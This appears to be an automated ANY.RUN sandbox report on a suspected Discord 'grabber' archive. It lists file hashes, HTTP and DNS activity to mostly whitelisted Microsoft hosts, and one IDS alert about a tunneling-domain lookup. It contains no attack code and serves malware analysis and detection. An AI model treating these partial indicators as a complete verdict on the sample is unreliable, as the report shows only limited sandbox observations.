SHA256:4E8836498C51C5AFB831B600289318102088A8418B60550AF9C0763DE85E2B3F
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\img\em0.pngimage
MD5:0F1BEDCD0AE85F68FDB3E2D041BCEA8A
SHA256:4783A629FBBCC597AAEA88AFA8147AA285EE9273B1282E350753CF0CDC9A2BA3
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\img\bu0.pngimage
MD5:A88C941F498DBF0D05022CFF06719CDA
SHA256:5F2F94E2206FD6516CDE8B3068B31A248D2080A094CD1406A60EFB70A7ECE42C
6200WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa6200.49488\discord-image-grabber-main\img\em1.pngimage
MD5:D558A83AF8C6913F87CB82CDB5C2EA0D
SHA256:F3BC44F23F86648C8A2C686A88D70F65F403945CF40A679439ABB4B0EC5500E9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
35
DNS requests
21
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3732
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
3260
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
3260
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7036
WerFault.exe
GET
200
2.16.164.73:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
7036
WerFault.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3220
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5064
SearchApp.exe
104.126.37.123:443
www.bing.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
40.126.32.74:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.174
whitelisted
www.bing.com
  • 104.126.37.123
  • 104.126.37.163
  • 104.126.37.131
  • 104.126.37.185
  • 104.126.37.130
  • 104.126.37.176
  • 104.126.37.170
  • 104.126.37.179
  • 104.126.37.137
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
  • 2.16.164.73
  • 2.16.164.107
  • 2.16.164.16
  • 2.16.164.88
  • 2.16.164.89
  • 2.16.164.17
  • 2.16.164.115
  • 2.16.164.83
  • 2.16.164.122
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 88.221.169.152
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.32.74
  • 40.126.32.138
  • 40.126.32.133
  • 40.126.32.76
  • 20.190.160.14
  • 40.126.32.134
  • 20.190.160.22
  • 40.126.32.72
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.223.36.55
whitelisted

Threats

PID
Process
Class
Message
2192
svchost.exe
Misc activity
ET INFO Packetriot Tunneling Domain in DNS Lookup (pktriot .net)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
discord-image-grabber-main.zip